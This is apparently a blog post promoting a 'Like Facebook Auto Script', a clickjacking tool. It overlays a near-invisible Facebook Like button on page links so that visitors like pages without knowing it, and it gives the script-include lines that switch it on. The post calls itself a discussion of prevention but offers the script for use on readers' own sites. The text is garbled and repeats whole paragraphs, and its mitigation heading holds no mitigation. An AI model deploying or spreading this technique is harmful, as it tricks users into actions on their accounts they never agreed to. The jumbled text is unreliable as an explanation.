Like Facebook Auto Script for setting up a web page that users will make a facebook like without his knowledge when clicking on any links on the page. This works by pulling a (very low opacity) facebook as invisible as the mouse button when the user put a link.
After you click on a link, users will like the current page in facebook and in fact will be redirected href (via javascript magic - document.location.href) and a cookie will be defined for the facebook button no longer appears as the download page in the future.
Thus, the code following it easy to find on the site if you use it in your website and I personally will report to you if you use it for malicious reasons.
What we will see in the future
Before discussing how clickjacking will be developed, an assumption that is important to note: it can share a site not directly connected to the node as the set, which means I can put a fernandomagro.com like a button as the site / domain name.
Therefore, it can create a database of websites and generate a lot of different buttons repeatedly in the same web page.
Wrapping it all up, when Facebook Clickjacking go viral, I believe we will start to feel like clickjacking / share straight from malicious site with large galleries very much clicking going on. For example, a photo gallery with 500 interesting, imagine pressing the galleries in 2 hours and then go back and make facebook accounts were flooded with a large number of unrequested.
Change the header of your website as follows:
How to word Like Facebook Auto Script
Because we can not inject css, javascript inside the iframe facebook, we can not change cursor: pointer css property when the mouse on the button like, so it is always suspect a page always with a mouse clicking hand. The workaround is to make as the mouse button when it's normal to have a mouse clicking hand (cursor: pointer) such as when hovering a link!
After you click on a link, users will like the current page in facebook and in fact will be redirected href (via javascript magic - document.location.href) and a cookie will be defined for the facebook button no longer appears as the download page in the future.
Mitigation Like Facebook Auto Script
The purpose of this scenario is to create a discussion about how to prevent clickjacking and use this script for any reason other than security debugging you can violate the Terms of Service Facebook and reports service and may lose your Facebook account.
What we will see in the future
Before discussing how clickjacking will be developed, an assumption that is important to note: it can share a site not directly connected to the node as the set, which means I can put a fernandomagro.com like a button as the site / domain name.
Therefore, it can create a database of websites and generate a lot of different buttons repeatedly in the same web page.
Wrapping it all up, when Facebook Clickjacking go viral, I believe we will start to feel like clickjacking / share straight from malicious site with large galleries very much clicking going on. For example, a photo gallery with 500 interesting, imagine pressing the galleries in 2 hours and then go back and make facebook accounts were flooded with a large number of unrequested.
Install it Like Facebook Auto Script
I managed to wrap around a nice javascript file that you just need to include to make it work in your site.Change the header of your website as follows:
<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="clickjacking.js"></script>
No comments:
Post a Comment